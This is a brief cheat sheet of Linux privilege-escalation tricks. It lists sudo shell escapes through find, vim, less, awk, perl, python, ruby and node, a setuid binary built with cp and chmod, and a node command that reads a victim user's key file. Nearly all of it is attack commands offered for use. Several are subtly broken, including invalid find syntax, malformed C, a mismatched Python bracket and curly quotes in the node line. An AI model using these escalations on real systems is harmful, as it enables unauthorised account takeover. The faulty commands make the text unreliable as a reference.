Privilege Escalations

Using find’s -exec parameter

sudo -u \<user-that-can-run-vim\> find / -name example -exec !/bin/bash \;

Using vim

sudo -u <user-that-can-run-vim> vim . Then run :!/bin/bash inside vim to get a shell.

Using less

sudo -u <user-that-can-run-less> less . Then run :!/bin/bash inside less to get a shell.

Using awk

sudo -u <user-that-can-run-awk> awk 'BEGIN {system("/bin/bash")}'

Using setuid or setgid (chmod and cp)

  • Write a c program like below

    • int main() { system(cat "/usr/home/file.txt"); }
  • Compile it using gcc -o foo foo.c.

  • Since cp can be run, use sudo -u <user-that-can-run-cp> cp foo /tmp/foo1.

  • After copying, the owner of the file foo1 becomes <user-that-can-run-cp>.

  • Change file permission using sudo -u <user-that-can-run-chmod> chmod +xs foo1

  • Run the file using ./foo1.

Using perl

sudo -u <user-that-can-run-perl> perl -e '`/bin/bash`'

!!!Use single quotes only. not double quotes!!!

Using python

  • sudo -u <user-that-can-run-python> python
  • >>> from subprocess import call
  • call(['/bin/bash')
  • Shell for <user-that-can-run-python> attained.

Using ruby

  • sudo -u <user-that-can-run-ruby> /usr/bin/ruby -e 'require "irb" ; IRB.start(__FILE__)'
  • This will open an interactive ruby environment (irb(main):001:0>). Now type `/bin/bash`

Using node

  • node -e

var exec = require('child_process').exec; exec('[COMMAND]', function (error, stdOut, stdErr) { console.log(stdOut); });

where [COMMAND] is the command that need to be executed.

sudo -u victim node -e ‘var exec = require(“child_process”).exec; exec(“cat /home/victim/key.txt”, function (error, stdOut, stdErr) { console.log(stdOut); });’